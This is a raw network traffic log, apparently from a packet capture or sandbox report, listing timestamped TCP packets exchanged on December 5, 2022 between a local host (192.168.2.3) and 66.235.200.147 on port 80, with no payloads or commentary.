Dec 5, 2022 01:32:37.865410089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865425110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865432978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865442991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865456104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865462065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865472078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865482092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865483999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865495920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865500927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865519047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865520954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865534067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865537882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865556002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865556002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865573883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865575075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865587950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865592957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865611076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865612030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865628958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865633965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865644932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865648031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865665913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865668058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865680933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865684032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865703106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865704060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865721941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865725040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865739107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865751028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865757942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865770102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865787029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865791082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865804911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865804911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865822077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865828037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865839005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865839958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865858078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865860939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865875959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865875959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865891933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865895033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865912914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865917921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865931034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865931034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865948915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865952969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865966082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.865978956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.865981102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866008043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866014957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866031885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866031885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866044044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866050005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866060019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866067886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866072893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866087914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866092920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866106033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866111040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866122961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866128922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866139889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866142988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866156101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866158962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866175890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866183996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866192102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866198063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866210938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866218090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866230011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866230011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866247892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866252899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866264105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866265059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866281986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866291046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866297960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866303921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866316080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866317034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866333961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866342068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866350889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866357088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866369009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866379023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866386890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866389990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866404057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866411924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866421938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866424084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866440058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866447926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866457939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866461992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866475105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866482019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866492987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866497040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866511106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866517067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866528034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866532087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866545916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866554022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866561890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866565943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866585016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866590977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866601944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866606951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866619110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866626978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866636992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866641998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866655111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866663933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866671085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866679907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866688967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866698027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866707087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866724968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866724968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866724968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866740942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866740942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866759062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866775036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866779089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866792917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866792917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866811037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866827011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866827011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866847038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866852999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866864920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866906881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866908073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866921902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866921902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866929054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866946936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866965055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866967916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.866982937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.866993904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867001057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867016077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867019892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867027044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867038965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867048025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867058039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867062092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867077112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867082119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867095947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867104053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867114067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867115021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867132902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867136002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867147923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867152929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867171049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867177963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867189884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867189884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867208958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867225885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867243052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867254019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867260933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867281914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867300987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867319107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867336035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867352962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867369890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867381096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867382050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867382050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867382050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867387056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867382050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867382050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867405891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867424965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867443085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867453098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867453098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867453098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867453098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867461920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867480040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867495060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867495060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867497921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867517948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867527008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867527008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867541075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867568016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867569923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867568016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867587090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867604017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867620945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867624998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867638111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867650032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867661953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867674112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867680073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867697001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867697001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867714882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867724895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867724895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867733002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867750883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867758036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867758036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867768049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867783070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867785931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867804050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867811918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867811918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867820978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867839098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867846012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867846012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867856026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867873907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867878914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867878914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867891073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867908001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867923975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867928982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867928982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867940903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867958069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867957115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867957115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867974997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.867988110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867988110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.867994070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868012905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868017912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868017912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868030071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868040085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868048906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868055105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868067026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868074894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868084908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868094921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868103027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868112087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868120909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868129015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868141890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868144989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868158102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868165970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868175030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868182898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868195057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868197918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868212938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868221998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868230104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868243933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868247986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868263960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868280888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868288994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868288994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868288994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868299007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868315935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868318081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868318081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868334055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868335009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868351936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868367910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868383884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868393898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868402004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868410110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868419886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868424892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868437052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868453979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868457079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868470907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868479967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868479967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868489981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.868501902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868522882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.868544102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875714064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875731945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875747919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875760078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875776052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875792980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875808954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875827074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875844002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875844002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875861883 CET	80	49705	66.235.200.147	192.168.2.3
